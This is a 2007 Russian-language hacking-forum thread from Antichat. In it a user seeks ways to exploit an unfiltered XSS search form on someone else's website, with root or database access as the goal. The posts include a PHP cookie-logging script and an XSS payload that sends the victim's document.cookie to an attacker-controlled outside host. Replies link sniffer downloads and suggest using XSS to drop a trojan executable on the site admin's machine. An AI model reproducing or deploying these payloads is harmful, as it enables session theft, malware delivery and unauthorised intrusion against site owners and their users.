HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

xss. - другие варианты использования...
  #1  
Старый 14.02.2007, 01:35
Lizardman
Познающий
Регистрация: 05.02.2007
Сообщений: 78
С нами: 10137280

Репутация: 109
По умолчанию xss. - другие варианты использования...

День добрый.

Наткнулся недавно на одном сайте на форму, в которой вообще не идет фильтрация. Т.е. <script>alert()</script> проходит. Причем сначала пытался замаскировать скрипт, но потом выяснил, что все и так проходит.
Это форма поиска, движок самописный, на полноценном хосте.
Отсюда вопрос- что с такой формы можно поиметь? Насколько я понял из статей, можно вставить ссылку на сниффер и кинуть админу, тем самым подтибрив его куки. Но этот способ не самый подходящий, т.к. цель- рут/бд, а не админка на сайте.

Если куки- единственный вариант, то как все-таки зарегить снифер на античате? Прохожу процесс регистрации, но там сказано- если вводили пароль, то придется ввести его и при входе в сниффер. Но на деле пароль и логин не спрашиваются.

Пробовал также сделать собственный сниффер.
Код:
<?php>  $query = $_SERVER['QUERY_STRING'];  
$query .= "\n"; 
$db="cookies.txt"; 
$fh=fopen ($db, "a+"); 
fputs ($fh, "$query"); 
?>
Вставлял ссылку
http://***.ru/***<script>document.location.replace('http://***2.ru/sniff.php?com='+document.cookie);</script>
Соотвественно, выложил на бесплатный хост jino-net.ru, создал файл cookies.txt, установил права на запись. Но все равно не пашет, размер файла не меняется с 0 кб.

Все таки, интересуют другие варианты использования XSS, но в инете вылезеют десятки однотипных статей по куки.
Буду признателен за помошь.
 
Ответить с цитированием

  #2  
Старый 14.02.2007, 03:16
+StArT+
Познающий
Регистрация: 10.02.2007
Сообщений: 38
С нами: 10130311

Репутация: 183
По умолчанию

Вот хороший сниффер.
_http://kanick.ru/sniffer/public.rar
_http://kanick.ru/sniffer/personal.rar

Можно еще с помощью XSS загрузит на комп жертвы "трой" *.exe (ну или другой исполняемый файл)

Смотри видео Zadoxlikа _http://video.antichat.ru/file46.html
 
Ответить с цитированием

  #3  
Старый 14.02.2007, 18:19
Lizardman
Познающий
Регистрация: 05.02.2007
Сообщений: 78
С нами: 10137280

Репутация: 109
По умолчанию

Пасиб, посмотрел. Баг ИЕ с загрузкой файла уже не работает, естественно, но идея хорошая. Можно попробовать другой сплоит засунуть.

Этот сниффер тоже не пашет(( заливаю на jino-net.ru, выставляю нужные права- все равно "ошибка 500". А другой хост придется ждать, пока зарегестируют, мой на h15 похерили уже((
 
Ответить с цитированием

  #4  
Старый 14.02.2007, 22:22
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами: 10223973

Репутация: 123
По умолчанию

Тебе кто сказал, что он не работает, знаешь скока народу на ИЕ 6 до сих пор сидит, так что ещё как работает
 
Ответить с цитированием

  #5  
Старый 14.02.2007, 22:36
Lizardman
Познающий
Регистрация: 05.02.2007
Сообщений: 78
С нами: 10137280

Репутация: 109
По умолчанию

На своей машине проверил, ИЕ 6 меня послал. Правда заплатки стоят все. Админ просто большой фанат ИЕ, у него точно заплатки, мб даже ИЕ 7 стоит.

Сниффер заработал кста. Там файл .htacces вызывал ошибку 500 по неясной причине. На себе пока проверяю работу))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Веб-уязвимости 519 23.09.2021 11:44
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...